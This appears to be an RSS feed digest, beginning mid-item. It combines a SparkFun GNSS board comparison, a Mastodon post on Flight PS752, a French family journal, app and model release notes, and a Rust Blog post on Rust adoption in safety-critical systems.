- ZED-F9P: 5.5 MHz
- ZED-X20P: 7.25-12.8 MHz
Notes: The transfer rate for the ZED-X20P is based on the load capacitance. SPI interface must be enabled by the jumper.
I2C Interface
The ZED-F9P only supported I2C fast-mode; while the ZED-X20P supports standard mode, fast mode, and fast mode plus.
Max bit rate:
- ZED-F9P: 400 kbit/s
- ZED-X20P: 1000 kbit/s
USB Interface
While both boards provide a USB-C connection to the GNSS receiver, on the ZED-X20P we would advise users not to rely on this interface in their designs.
Notes: For the ZED-X20P, we broke out this interface as part of a preliminary design recommendation. However, u-blox has recently removed this interface from their latest datasheet. Therefore, we would recommend that users not integrate this interface into their future designs. Especially when it doesn’t support firmware updates.
Software Changes
Firmware Upgrade
As mentioned about the USB interface, above, it is only possible to perform firmware updates through the UART1 interface for the ZED-X20P.
Firmware upgrade through I2C (Qwiic) is possible, but is only for advanced users. You need (e.g.) a Thing Plus board running a sketch to convert USB UART to I2C. Then you need to run the u-blox ubxfwupdate.exe from the command line with some special settings.
u-center Application
One of the biggest changes between the two GNSS receivers is the u-center software application. u-blox recommends their new u-center 2 software application for any GNSS engine, generation 10 or later.
The first difference between the two applications is that users will notice is a required user account for u-center 2. While users will need internet access to initially login, users will not need internet access or to login afterwards.
Beyond a new look and feel, the primary difference in functionality between the two applications is that the new generation 10 GNSS engines implement a new set/get method for the values in the configuration layers of the GNSS receiver. This is handled in the backend of the software application, but should be noted for any development purposes.
Some other notes to mention:
- With the new workspace configuration allows users to save setups and layouts when testing different GNSS receivers.
- With the required login, u-blox also integrates their new PPP services and their support portal in the u-center 2 application for users.
- u-blox also wrote up this blog post with a few tips and tricks for the new software application.
Notes: Nate has found that if users wish to continue using the original version of u-center (not u-center 2), they just need to use the generation 9 advanced configuration view. See Section 5.2.7 Generation 9 configuration view of this manual.
Arduino Library
With the introduction of the set/get method for configuration values for the gen 10 GNSS engines, our Arduino library got a new release (v3). The Arduino library should be mostly backwards compatible, with a few minor changes, see below for more information:
learn.sparkfun.com | CC BY-SA 3.0 | SparkFun Electronics | Niwot, Colorado
-
🔗 @cxiao@infosec.exchange If you know anyone in the Iranian-Canadian community, you know how hard the mastodon
If you know anyone in the Iranian-Canadian community, you know how hard the loss of Flight PS752 affected them. Entire families were lost, and some communities, like the Persian community in Richmond Hill, were especially devastated.
In recent days, these communities have had to deal with not only remembering the 6th anniversary of this tragedy, but have also had to watch as the same perpetrators of this crime, the IRGC and the rest of the regime, have slaughtered Iranian protestors without the world paying any attention. And now that Iran is past the 132nd hour of a complete internet shutdown, and at the same time reports of thousands of casualties are emerging, they need to worry about whether their loved ones are safe.
I encourage all Canadians to read the statement by the Association of Families of Flight PS752 Victims about what is happening now: https://www.ps752justice.com/statement-of-the-association-of-families-of- flight-ps752-victims-regarding-the-internet-shutdown-and-killings-in- iran/
I have made a donation to the Association as well, for their continued work in remembering the victims, supporting the families, and calling for justice in Iran.
You can read about the victims here as well: https://www.cbc.ca/news2/interactives/flightps752/
-
🔗 sacha chua :: living an awesome life La semaine du 5 janvier au 11 janvier rss
Lundi, le cinq janvier
Ma fille est devenue grincheuse probablement à cause d'une mauvaise communication ce matin. Elle n'a pas continué à l'école aujourd'hui. Elle n'est pas allée au cours de gym parce qu'elle était de mauvaise humeur. Elle est restée dans sa chambre toute la journée. Alors, s'inquiéter, ça ne sert à rien. Au lieu de stresser, j'ai déneigé. La neige était légère, et le fait de déneiger m'a changé les idées. Ensuite, je me suis préparée pour ma session avec ma tutrice. En addition des entrées de cette semaine, nous avons aussi révisé une entrée de la semaine dernière.
Elle n'a pas besoin d'un câlin, mais elle est revenue pour le déjeuner. Elle m'a permis de lui brosser les dents et de lui nettoyer ses piercings.
J'ai écrit mon bulletin Emacs pendant une diffusion en direct. Quelques spectateurs ont fait des commentaires. ( Merci ! ) J'ai besoin d'ajuster la configuration de l'audio. Un jour, ce sera plus facile.
Maintenant, c'est le moment de l'inscription pour l'école. Je vais me renseigner sur le processus pour l'année prochaine, au cas où nous déciderons d'expérimenter l'instruction en famille pour le reste de l'année. Je vais aussi me renseigner sur le processus au cas où nous l'inscririons en cours d'année. Nous allons recevoir le carnet de notes en février. Alors que ma fille semble passer son temps à ne rien faire, cela reste instructif. Je pense que ma fille peut trouver son propre chemin. Malgré notre grande liberté et les nombreuses tentations de flâner, mon mari et moi continuons d'apprendre chaque jour. Ma fille aime proposer sans cesse des idées d'amélioration. Des familles que nous connaissons et qui vivent selon les principes de l'apprentissage libre semblent développer des passions intéressantes.
Pour le souper, j'ai préparé du bœuf salé en boîte. Ma fille et moi l'avons mangé avec du riz et du pak-choï.
Mardi, le six janvier
Nous nous sommes levés très tôt et nous sommes allés à l'hôpital pour l'examen médical de ma fille. Elle a dû jeûner et boire seulement de l'eau et du jus de pomme. Nous sommes arrivés exactement à l'heure (trente minutes avant le rendez-vous). Après environ trente minutes d'attente au-delà de l'heure prévue du rendez-vous, elle a eu l'échographie. C'est correct, donc je l'ai emmenée dehors pour manger sur le pouce avant son deuxième rendez-vous. Le médecin a dit que tout allait bien et nous n'avons pas besoin de plus de rendez-vous avec eux l'année prochaine. Après l'examen, elle voulait aller à l'espace de jeux de l'hôpital. Elle a colorié un dessin, elle a joué dans un petit café, et elle a joué aux trains.
Sur le chemin du retour, nous sommes passés chez Nella Cucina pour voir un couteau adapté aux enfants. Ma fille voulait un couteau comme un santoku parce que les aliments ne collent pas dessus. Tous les couteaux sont trop grands ou trop petits ou ne sont pas comme un santoku. Peut-être qu'elle devrait le chercher en ligne.
Elle avait si faim. Elle avait hâte de manger des nouilles instantanées avec plus de gâteau au poisson. Elle a utilisé la moitié du sachet d'épices et m'a donné l'autre moitié. J'ai préparé des nouilles conventionnelles. J'ai ajouté des algues et du gâteau au poisson, qu'elle m'a presque tout piqué. Elle avait très faim. Ce n'était pas grave, j'ai mangé du pain avec du beurre.
Après tout ça, j'ai appelé son école pour connaître la procédure à suivre au cas où nous la retirerions de l'école et voudrions la réinscrire ensuite. La secrétaire n'était pas sûre, donc je me suis retrouvée à parler au directeur, ce qui était un peu embarrassant. Toutefois, j'ai appris que :
- Presque tous les étudiants de l'école virtuelle vont rester, à l'exception de quelques personnes qui vont rentrer à l'école en présentiel.
- Ils reçoivent une ou deux demandes chaque jour à l'extérieur de la période normale d'inscription, et doivent rejeter presque toutes les demandes à l'exception de cas graves, comme des raisons médicales.
- Si notre fille continue, sa place est assurée pour l'année prochaine.
- Si je l'inscris pour l'année prochaine avant le 23 janvier :
- S'ils nous offrent une place en février, si notre fille se retire, elle pourrait revenir à l'école virtuelle.
- S'ils ne nous offrent pas une place et que notre fille se retire et ensuite change d'avis, elle ne bénéficiera peut-être pas d'une exception et nous devrions attendre l'année suivante.
- Si je ne l'inscris pas pour l'année prochaine, et si notre fille se retire et ensuite change d'avis, peut-être que nous devrions attendre l'année suivante.
Pouvons-nous accepter son mécontentement face à la situation actuelle ? Pouvons-nous accepter l'incertitude pour plus d'une année ? Je pense que nous pouvons attendre jusqu'à ce que la situation s'éclaircisse.
Mercredi, le sept janvier
J'étais un peu fatiguée quand je me suis levée. Au lieu d'exercice, j'ai déneigé autour des drains et j'ai essayé d'écoper la flaque sur le trottoir. C'était trop difficile parce que la neige est devenue glace. Tant pis.
Une réflexion sur l'apprentissage de ma fille :
Ma fille aime bien lire. Elle lit pour le plaisir et discute des livres avec nous un peu comme ses devoirs que l'enseignant veut qu'elle fasse mais qu'elle ne les fait pas. Nous apprécions les mots intéressants qu'elle accumule en lisant et peut utiliser au moment opportun. "I'm ravenously hungry," dit-elle. Grâce à mon apprentissage en français, je peux partager ma propre exultation quand je trouve un nouveau mot magnifique.
Ma fille aime bien les mathématiques. Elle adore exercer son cerveau en calculant et en résolvant des problèmes que je lui pose. Elle trouve que le cours est ennuyeux parce qu'il est trop lent. Elle trouve que la programmation simple dans Minecraft Education est trop simple. Elle me demande de plus de challenges et essaie d'autres exercices elle-même, grâce aux livres Beast Academy.
Ma fille aime bien lancer des idées variées d'amélioration ou d'entreprise. Par exemple, quand elle joue à la marchande, elle prépare ses propres collations en vrai et me les vendent contre cinq tapes dans la main.
Je pense que l'école peut nous aider au développement de ses compétences. Les enseignants peuvent fournir l'évaluation extérieure que je ne peux fournir parce que je n'ai pas l'expérience. C'est aussi une occasion pour pratiquer la gestion de ses propres tâches. Après la résistance initiale, ma fille est fière quand elle accomplit ses tâches.
Mon mari pense que l'évaluation extérieure est importante. Ce n'est pas grave si notre fille reçoit des notes basses maintenant. Peut-être que il est encore utile pour la renseigner. Je suis d'accord, donc je peux attendre, particulièrement puisque je n'ai pas trouvé d'alternative qui nous inspire confiance. C'est possible que ses œuvres suffisent. Si elle est grincheuse contre le système, l'enseignant ou moi, je préfère qu'elle soit grincheuse contre le système et qu'elle choisisse de réussir malgré ces limitations. On va voir.
D'ailleurs, la plupart du temps, c'est acceptable, et elle est fière qu'elle puisse faire les choses elle-même. Ça va.
J'ai finalement créé un logiciel pour créer ou télécharger le brouillon du prochain bulletin de la Bike Brigade sur Google Drive. J'ai aussi fait une fonction dans Emacs pour créer ou modifier la campagne sur MailChimp grâce au modèle. Ça signifie que je peux mettre à jour le bulletin de brouillon avec moins de clics. Ça simplifie mon flux de travail. Un jour je veux automatiser tout le processus à part l'écriture, que les autres bénévoles pourront faire.
Ma fille essayait Pokémon sur le GameBoy Advance de mon mari pendant que je l'interrogeais sur ses devoirs et je tapais ses réponses. Parfois je faisais la secrétaire pour elle, ce qui l'aide beaucoup.
Jeudi, le huit janvier
Au lieu de suivre une vidéo d'exercice, j'ai pris une pelle et creusé une rigole dans la glace pour drainer la flaque sur le trottoir plus bas dans la rue. La météo a annoncé que la journée de demain serait plus chaude, donc peut-être que le canal aidera à éviter que le trottoir ne soit inondé (ou du moins, moins d'inondations). C'était un bon exercice. Ensuite mes mains étaient très fatiguées, donc je me suis concentrée sur les tâches qui ne nécessitent pas de trop taper. J'ai revu mes cartes Anki, j'ai amélioré ma configuration d'audio, et j'ai enregistré une courte vidéo qui démontre ma fonction pour dicter une note à la tâche actuelle.
Quand mes mains allaient mieux, j'ai fait plus de programmation. Je veux automatiser l'exécution des logiciels chaque jour et chaque semaine, par exemple le renouvellement de nos livres empruntés à la bibliothèque ou mon nouveau logiciel pour créer un brouillon du bulletin d'information de la Bike Brigade. Cependant, mon ordinateur n'est pas allumé sans cesse. Je me suis renseignée sur comment configurer des tâches persistantes dans systemd. De cette façon, ces tâches vont s'exécuter un peu de temps après le démarrage de mon ordinateur, pourvu que je les aie configurées correctement. On va voir demain si les tâches se lanceront.
Ma fille et moi avons fait une promenade pendant la pause déjeuner, mais nous avons oublié que la bibliothèque ouvre à 12h30 (midi et demi) jeudi. Elle est devenue un peu grincheuse parce qu'elle a hâte d'avoir plus de livres, mais le soleil brillait et je maintenais une conversation légère, donc ce n'était pas grave. Elle est rentrée à l'école virtuelle juste à l'heure.
Après l'école, j'ai emmené ma fille au parc pour jouer avec son amie. Bon, en vrai, je pense qu'elle jouait plus avec la chienne de son amie qu'avec son amie. Je suppose que c'est juste une de ces journées.
Un fil sur Reddit m'a inspiré à penser aux buffers d'Emacs. J'ai revu ma configuration pour beaucoup d'exemples d'usage en dictant des notes avec ma nouvelle fonction pour les rassembler avec les liens, ce qui était très utile. Je pense que je vais faire une diffusion en direct avant d'écrire un billet sur le sujet. Quand… Peut-être que vendredi après-midi est un bon moment pour ça.
Ma fille était curieuse au sujet de Pokémon parce que mon mari y jouait sur sa GameBoy Advance. Elle m'a demandé si je pouvais trouver Pokémon Blanc. Je l'ai installé dans un émulateur sur mon ordinateur. Parce que mon ordinateur était occupé, j'ai ressuscité mon ancienne machine et je l'ai utilisée pour me connecter à mon ordinateur actuel via SSH pour continuer à écrire mon journal, grâce à Linux qui est orienté serveur.
Vendredi, le neuf janvier
Succès ! Selon ma fille, elle peut préparer son propre déjeuner mieux que moi. Ce matin, elle l'a refait parce que j'ai déchiré le prosciutto en morceaux trop petits. Maintenant elle peut emporter son propre déjeuner et son propre collation. Elle survivra.
J'ai essayé de prévoir une diffusion en direct ce matin sur la configuration d'Emacs. En tout cas, je veux le faire, alors autant essayer de partager en direct. J'ai amélioré mon processus pour dicter des notes. Maintenant je peux faire une capture d'écran automatiquement, et tous les audios sont enregistrés avec un horodatage.
L'après-midi, le temps était beau, donc j'ai fait du vélo aux Stockyards pour chercher les pyjamas que j'avais achetés pour ma fille. J'ai oublié de lui brosser les dents pendant la pause déjeuner. Je l'ai fait pendant la récré de l'après-midi.
J'ai aussi essayé la reconnaissance vocale sur Google Chrome. J'ai modifié un logiciel pour la reconnaissance vocale en continu pour montrer les énoncés précédents et envoyer des messages au serveur, et j'ai créé un serveur qui retransmet les messages à Emacs. Dans Emacs, j'ai affiché les messages dans un buffer. La reconnaissance vocale sur Google Chrome est plus rapide que sur WhisperX et elle peut supporter un flux, mais elle n'utilise pas de ponctuation et la qualité est moindre. Je pense qu'elle sera utile pour la reconnaissance vocale des flux multiples simultanés pendant la prochaine conférence, ou en solution de secours pendant que je fais une diffusion en direct.
Le vent était fort, donc nous sommes restés à la maison. Après l'école, ma fille a exploré un kit de gemmes cachées en forme de volcan. Ma fille aime bien ces kits. Une fois les gemmes découvertes, je lui ai donné des fils de fer et lui ai montré comment les sertir avec du fil de fer.
Nous avons mangé des petits pains chinois pour le souper.
Ma fille voulait faire une robe à volants qui forme des manches courtes. (Peut-être comme cette robe ?) Nous avons regardé des tissus en ligne jusqu'à ce que je sois surstimulée entre les nombreux choix et son jacassement. J'ai besoin de calme.
Elle est allée dans sa chambre pour probablement jouer à Minecraft. Mon mari a travaillé sur l'installation de RetroPie sur la Raspberry Pi pour que ma fille puisse jouer à Pokémon plutôt que sur mon ordinateur ou sur un ancien ordinateur qui a besoin d'un câble vidéo différent.
Samedi, le dix janvier
Ma fille m'a demandé des petites crêpes pour le petit-déjeuner, donc je lui ai fait de minuscules crêpes et quelques crêpes en forme de cœur. Après la routine matinale, ma fille a joué au courrier des choses. Elle a distribué les couverts dans le tiroir de la cuisine, la lessive dans les tiroirs de sa chambre, les ordures à la poubelle, et d'autres choses partout dans la maison.
J'ai préparé le bulletin de la Bike Brigade. Cette fois, j'ai créé une fonction pour envoyer un message de test via Mailchimp sous Emacs. Quand j'ai reçu la confirmation de l'autre bénévole, j'ai créé une fonction pour planifier la campagne sur Mailchimp sous Emacs. Maintenant, je peux surtout gérer la campagne sous Emacs sans clics, ce qui me rend heureuse.
L'après-midi, j'ai emmené ma fille à la patinoire pour jouer avec son amie. Le père de son amie a proposé une petite course, mais son amie paraissait triste et je sais que ma fille n'aime pas les jeux de compétition, donc nous avons trouvé d'autres activités plus coopératives entre elles. Le père était déjà trop rapide pour être attrapé, mais les amies se sont amusées à m'attraper quelques fois. Je pense qu'elles se sont plus amusées à courir après son père.
J'ai créé une interface pour la visualisation et la gestion du routage audio de Pipewire sous Emacs. Je veux enregistrer, diffuser en direct et faire de la reconnaissance vocale de ma propre voix ou du flux audio, possiblement en même temps, ce qui nécessite un loopback avec un peu de latence pour éviter les coupures audio. J'étais si préoccupée par ça que j'ai oublié de faire la vaisselle. Mon mari a cuisiné du gyudon et des pak-choïs, a fait la vaisselle et en a mangé seul, ce qui n'est pas comme d'habitude. Bref, la prochaine fois je ferai la vaisselle.
Après mon souper, je suis allée voir comment elle allait. Elle était grincheuse. Probablement qu'elle avait faim et froid, et qu'elle se sentait seule en m'attendant. J'ai réussi à désamorcer la situation en lui offrant le souper et des jeux de billes, ce qu'elle a accepté. Elle a bien aimé le gyudon. Comme promis, nous avons joué aux billes. Après ça, elle était de bonne humeur. Elle a joué à Pokémon. Pendant que je l'aidais, elle a travaillé sur ses devoirs.
À l'heure du coucher, elle et moi lisions un livre en alternance.
Elle a dit que ses dents lui faisaient mal, mais elle n'a pas voulu d'analgésique ou de compresse froide. Je lui ai offert une paille en silicone pour mordiller au cas où ça l'aiderait.
Dimanche, le onze janvier
Ma fille s'est levée plus tôt que moi ce matin, et elle était un peu impatiente en attendant. Je me suis finalement levée, mais j'étais encore un peu fatiguée.
Ma fille a joué à Pokémon Yellow. Elle a dit que ce n'est pas juste que le jeu ne permet pas de jouer en tant qu'une fille au lieu d'un garçon. Mon mari a trouvé un autre ROM qui permet ça, donc elle a recommencé le jeu vidéo. Je l'ai aidée pendant qu'elle faisait de l'exercice.
J'ai emmené ma fille à son premier cours de patinage à la patinoire au parc. En voyant les autres étudiants lutter pour se lever sur la glace, ma fille m'a dit que je l'avais inscrite au mauvais cours. Elle a trouvé que Learn to Skate 1 était trop facile. Heureusement, la professeure a pu l'amener de l'autre côté de la patinoire où elle participait à Learn to Skate 2, qui était en même temps. Le cours lui a plu. Sur l'autre patinoire, j'ai imité les exercices que les professeurs enseignaient aux enfants. Après le cours, nous avons passé du temps en patinant jusqu'à ce qu'elle ait trop froid. Quand la surfaceuse venait à la patinoire, tout le monde quittait la glace à l'exception d'une personne qui a emmené son enfant à la patinoire. Ma fille et moi nous sommes amusées parce que le superviseur les a poursuivis tellement rapidement.
Après être rentrée à la maison, j'ai fini mon entrée d'hier.
Notes
- Prononciation
- … au cas (silent s) où nous déciderons d'expérimenter l'instruction en famille pour le reste de l'année.
- Je pense que ma fille peut trouver son propre chemin. (sheuh mehn)
- Ma fille aime proposer sans cesse des idées d'amélioration. (dah mee lee oh rah seon)
- … nous sommes passés chez Nella Cucina pour voir un couteau adapté aux enfants. (ehn fehn)
- Elle avait hâte de manger des nouilles (nwee) instantanées (ein stahn tah nay) avec plus de gâteau au poisson.
- Elle a utilisé la moitié du sachet d'épices et m'a donné l'autre moitié. (mwah teay)
- … pendant que je l'interrogeais (lein tey roh jeas) sur ses devoirs et je tapais ses réponses.
- … ou du moins, moins d'inondations (dein non dah seons)
- … je me suis concentrée sur les tâches qui ne nécessitent (neh sess seet)
- Succès ! (suk say)
- … ce qui nécessite un loopback avec un peu de latence pour éviter les coupures (coo puurs) audio.
- Wording
- en addition de
- in addition to
- bref
- anyway, in short
- alors que
- while
- (no term)
- en … - gérondif: use present participle (ex: patinant)
- (no term)
- plus-que-parfait for things that happened before the passé composé
You can e-mail me at sacha@sachachua.com.
-
🔗 organicmaps/organicmaps 2026.01.14-6-android release
• NEW: Higher-contrast dark theme colors
• NEW: Google Assistant for navigation and search
• OSM map data as of January 11
• “Auto” navigation theme setting follows the system dark/light mode
• Thinner subway lines
• Search results show capacity for motorcycle parking, bicycle rental, bicycle charging, and car charging
• Show floor level in search results
• Albanian translations and TTS voice guidance
• Updated FAQ and app translations
• Fixed crashes
…more at omaps.org/newsSee a detailed announce on our website when app updates are published in all stores.
You can get automatic app updates from GitHub using Obtainium.sha256sum:
85c1bb509b7901e9d01e0c336ec0c705b4a571f1b1570c6441c4423a945147a6 OrganicMaps-26011406-web-release.apk -
🔗 r/LocalLLaMA GLM-Image is released! rss
| GLM-Image is an image generation model adopts a hybrid autoregressive + diffusion decoder architecture. In general image generation quality, GLM‑Image aligns with mainstream latent diffusion approaches, but it shows significant advantages in text-rendering and knowledge‑intensive generation scenarios. It performs especially well in tasks requiring precise semantic understanding and complex information expression, while maintaining strong capabilities in high‑fidelity and fine‑grained detail generation. In addition to text‑to‑image generation, GLM‑Image also supports a rich set of image‑to‑image tasks including image editing, style transfer, identity‑preserving generation, and multi‑subject consistency. Model architecture: a hybrid autoregressive + diffusion decoder design. submitted by /u/foldl-li
[link] [comments]
---|--- -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 release rss
sync repo: +1 release ## New releases - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): 0.2.1 -
🔗 Rust Blog What does it take to ship Rust in safety-critical? rss
This is another post in our series covering what we learned through the Vision Doc process. Inour first post, we described the overall approach and what we learned about doing user research. In our second post, we explored what people love about Rust. This post goes deep on one domain: safety-critical software.
When we set out on the Vision Doc work, one area we wanted to explore in depth was safety-critical systems: software where malfunction can result in injury, loss of life, or environmental harm. Think vehicles, airplanes, medical devices, industrial automation. We spoke with engineers at OEMs, integrators, and suppliers across automotive (mostly), industrial, aerospace, and medical contexts.
What we found surprised us a bit. The conversations kept circling back to a single tension: Rust's compiler-enforced guarantees support much of what Functional Safety Engineers and Software Engineers in these spaces spend their time preventing, but once you move beyond prototyping into the higher- criticality parts of a system, the ecosystem support thins out fast. There is no MATLAB/Simulink Rust code generation. There is no OSEK or AUTOSAR Classic- compatible RTOS written in Rust or with first-class Rust support. The tooling for qualification and certification is still maturing.
Quick context: what makes software "safety-critical"
If you've never worked in these spaces, here's the short version. Each safety- critical domain has standards that define a ladder of integrity levels: ISO 26262 in automotive, IEC 61508 in industrial, IEC 62304 in medical devices, DO-178C in aerospace. The details differ, but the shape is similar: as you climb the ladder toward higher criticality, the demands on your development process, verification, and evidence all increase, and so do the costs.1
This creates a strong incentive for decomposition : isolate the highest- criticality logic into the smallest surface area you can, and keep everything else at lower levels where costs are more manageable and you can move faster.
We'll use automotive terminology in this post (QM through ASIL D) since that's where most of our interviews came from, but the patterns generalize. These terms represent increasing levels of safety-criticality, with QM being the lowest and ASIL D being the highest. The story at low criticality looks very different from the story at high criticality, regardless of domain.
Rust is already in production for safety-critical systems
Before diving into the challenges, it is worth noting that Rust is not just being evaluated in these domains. It is deployed and running in production.
We spoke with a principal firmware engineer working on mobile robotics systems certified to IEC 61508 SIL 2:
"We had a new project coming up that involved a safety system. And in the past, we'd always done these projects in C using third party stack analysis and unit testing tools that were just generally never very good, but you had to do them as part of the safety rating standards. Rust presented an opportunity where 90% of what the stack analysis stuff had to check for is just done by the compiler. That combined with the fact that now we had a safety qualified compiler to point to was kind of a breakthrough." -- Principal Firmware Engineer (mobile robotics)
We also spoke with an engineer at a medical device company deploying IEC 62304 Class B software to intensive care units:
"All of the product code that we deploy to end users and customers is currently in Rust. We do EEG analysis with our software and that's being deployed to ICUs, intensive care units, and patient monitors." -- Rust developer at a medical device company
"We changed from this Python component to a Rust component and I think that gave us a 100-fold speed increase." -- Rust developer at a medical device company
These are not proofs of concept. They are shipping systems in regulated environments, going through audits and certification processes. The path is there. The question is how to make it easier for the next teams coming through.
Rust adoption is easiest at QM, and the constraints sharpen fast
At low criticality, teams described a pragmatic approach: use Rust and the crates ecosystem to move quickly, then harden what you ship. One architect at an automotive OEM told us:
"We can use any crate [from crates.io] [..] we have to take care to prepare the software components for production usage." -- Architect at Automotive OEM
But at higher levels, third-party dependencies become difficult to justify. Teams either rewrite, internalize, or strictly constrain what they use. An embedded systems engineer put it bluntly:
"We tend not to use 3rd party dependencies or nursery crates [..] solutions become kludgier as you get lower in the stack." -- Firmware Engineer
Some teams described building escape hatches, abstraction layers designed for future replacement:
"We create an interface that we'd eventually like to have to simplify replacement later on [..] sometimes rewrite, but even if re-using an existing crate we often change APIs, write more tests." -- Team Lead at Automotive Supplier (ASIL D target)
Even teams that do use crates from crates.io described treating that as a temporary accelerator, something to track carefully and remove from critical paths before shipping:
"We use crates mainly for things in the beginning where we need to set up things fast, proof of concept, but we try to track those dependencies very explicitly and for the critical parts of the software try to get rid of them in the long run." -- Team lead at an automotive software company developing middleware in Rust
In aerospace, the "control the whole stack" instinct is even stronger:
"In aerospace there's a notion of we must own all the code ourselves. We must have control of every single line of code." -- Engineering lead in aerospace
This is the first big takeaway: a lot of "Rust in safety-critical" is not just about whether Rust compiles for a target. It is about whether teams can assemble an evidence-friendly software stack and keep it stable over long product lifetimes.
The compiler is doing work teams used to do elsewhere
Many interviewees framed Rust's value in terms of work shifted earlier and made more repeatable by the compiler. This is not just "nice," it changes how much manual review you can realistically afford. Much of what was historically process-based enforcement through coding standards like MISRA C and CERT C becomes a language-level concern in Rust, checked by the compiler rather than external static analysis or manual review.
"Roughly 90% of what we used to check with external tools is built into Rust's compiler." -- Principal Firmware Engineer (mobile robotics)
We heard variations of this from teams dealing with large codebases and varied skill levels:
"We cannot control the skill of developers from end to end. We have to check the code quality. Rust by checking at compile time, or Clippy tools, is very useful for our domain." -- Engineer at a major automaker
Even on smaller teams, the review load matters:
"I usually tend to work on teams between five and eight. Even so, it's too much code. I feel confident moving faster, a certain class of flaws that you aren't worrying about." -- Embedded systems engineer (mobile robotics)
Closely related: people repeatedly highlighted Rust's consistency around error handling:
"Having a single accepted way of handling errors used throughout the ecosystem is something that Rust did completely right." -- Automotive Technical Lead
For teams building products with 15-to-20-year lifetimes and "teams of teams," compiler-enforced invariants scale better than "we will just review harder."
Teams want newer compilers, but also stability they can explain
A common pattern in safety-critical environments is conservative toolchain selection. But engineers pointed out a tension: older toolchains carry their own defect history.
"[..] traditional wisdom is that after something's been around and gone through motions / testing then considered more stable and safer [..] older compilers used tend to have more bugs [and they become] hard to justify" -- Software Engineer at an Automotive supplier
Rust's edition system was described as a real advantage here, especially for incremental migration strategies that are common in automotive programs:
"[The edition system is] golden for automotive, where incremental migration is essential." -- Software Engineer at major Automaker
In practice, "stability" is also about managing the mismatch between what the platform supports and what the ecosystem expects. Teams described pinning Rust versions, then fighting dependency drift:
"We can pin the Rust toolchain, but because almost all crates are implemented for the latest versions, we have to downgrade. It's very time- consuming." -- Engineer at a major automaker
For safety-critical adoption, "stability" is operational. Teams need to answer questions like: What does a Rust upgrade change, and what does it not change? What are the bounds on migration work? How do we demonstrate we have managed upgrade risk?
Target support matters in practical ways
Safety-critical software often runs on long-lived platforms and RTOSs. Even when "support exists," there can be caveats. Teams described friction around targets like QNX, where upstream Rust support exists but with limitations (for example, QNX 8.0 support is currently
no_stdonly).2This connects to Rust's target tier policy: the policy itself is clear, but regulated teams still need to map "tier" to "what can I responsibly bet on for this platform and this product lifetime."
"I had experiences where all of a sudden I was upgrading the compiler and my toolchain and dependencies didn't work anymore for the Tier 3 target we're using. That's simply not acceptable. If you want to invest in some technology, you want to have a certain reliability." -- Senior software engineer at a major automaker
coreis the spine, and it sets expectationsIn
no_stdenvironments,corebecomes the spine of Rust. Teams described it as both rich enough to build real products and small enough to audit.A lot of Rust's safety leverage lives there:
OptionandResult, slices, iterators,CellandRefCell, atomics,MaybeUninit,Pin. But we also heard a consistent shape of gaps: many embedded and safety-critical projects wantno_std-friendly building blocks (fixed-size collections, queues) and predictable math primitives, but do not want to rely on "just any" third-party crate at higher integrity levels."Most of the math library stuff is not in core, it's in std. Sin, cosine... the workaround for now has been the libm crate. It'd be nice if it was in core." -- Principal Firmware Engineer (mobile robotics)
Async is appealing, but the long-run story is not settled
Some safety-critical-adjacent systems are already heavily asynchronous: daemons, middleware frameworks, event-driven architectures. That makes Rust's async story interesting.
But people also expressed uncertainty about ecosystem lock-in and what it would take to use async in higher-criticality components. One team lead developing middleware told us:
"We're not sure how async will work out in the long-run [in Rust for safety- critical]. [..] A lot of our software is highly asynchronous and a lot of our daemons in the AUTOSAR Adaptive Platform world are basically following a reactor pattern. [..] [C++14] doesn't really support these concepts, so some of this is lack of familiarity." -- Team lead at an automotive software company developing middleware in Rust
And when teams look at async through an ISO 26262 lens, the runtime question shows up immediately:
"If we want to make use of async Rust, of course you need some runtime which is providing this with all the quality artifacts and process artifacts for ISO 26262." -- Team lead at an automotive software company developing middleware in Rust
Async is not "just a language feature" in safety-critical contexts. It pulls in runtime choices, scheduling assumptions, and, at higher integrity levels, the question of what it would mean to certify or qualify the relevant parts of the stack.
Recommendations
Find ways to help the safety-critical community support their own needs. Open source helps those who help themselves. The Ferrocene Language Specification (FLS) shows this working well: it started as an industry effort to create a specification suitable for safety-qualification of the Rust compiler, companies invested in the work, and it now has a sustainable home under the Rust Project with a team actively maintaining it.3
Contrast this with MC/DC coverage support in rustc. Earlier efforts stalled due to lack of sustained engagement from safety-critical companies.4 The technical work was there, but without industry involvement to help define requirements, validate the implementation, and commit to maintaining it, the effort lost momentum. A major concern was that the MC/DC code added maintenance burden to the rest of the coverage infrastructure without a clear owner. Now in 2026, there is renewed interest in doing this the right way: companies are working through the Safety-Critical Rust Consortium to create a Rust Project Goal in 2026 to collaborate with the Rust Project on MC/DC support. The model is shared ownership of requirements, with primary implementation and maintenance done by companies with a vested interest in safety-critical, done in a way that does not impede maintenance of the rest of the coverage code.
The remaining recommendations follow this pattern: the Safety-Critical Rust Consortium can help the community organize requirements and drive work, with the Rust Project providing the deep technical knowledge of Rust Project artifacts needed for successful collaboration. The path works when both sides show up.
Establish ecosystem-wide MSRV conventions. The dependency drift problem is real: teams pin their Rust toolchain for stability, but crates targeting the latest compiler make this difficult to sustain. An LTS release scheme, combined with encouraging libraries to maintain MSRV compatibility with LTS releases, could reduce this friction. This would require coordination between the Rust Project (potentially the release team) and the broader ecosystem, with the Safety-Critical Rust Consortium helping to articulate requirements and adoption patterns.
Turn "target tier policy" into a safety-critical onramp. The friction we heard is not about the policy being unclear, it is about translating "tier" into practical decisions. A short, target-focused readiness checklist would help: Which targets exist? Which ones are
no_stdonly? What is the last known tested OS version? What are the top blockers? The raw ingredients exist in rustc docs, release notes, and issue trackers, but pulling them together in one place would lower the barrier. Clearer, consolidated information also makes it easier for teams who depend on specific targets to contribute to maintaining them. The Safety-Critical Rust Consortium could lead this effort, working with compiler team members and platform maintainers to keep the information accurate.Document "dependency lifecycle" patterns teams are already using. The QM story is often: use crates early, track carefully, shrink dependencies for higher-criticality parts. The ASIL B+ story is often: avoid third-party crates entirely, or use abstraction layers and plan to replace later. Turning those patterns into a reusable playbook would help new teams make the same moves with less trial and error. This seems like a natural fit for the Safety- Critical Rust Consortium's liaison work.
Define requirements for a safety-case friendly async runtime. Teams adopting async in safety-critical contexts need runtimes with appropriate quality and process artifacts for standards like ISO 26262. Work is already happening in this space.5 The Safety-Critical Rust Consortium could lead the effort to define what "safety-case friendly" means in concrete terms, working with the async working group and libs team on technical feasibility and design.
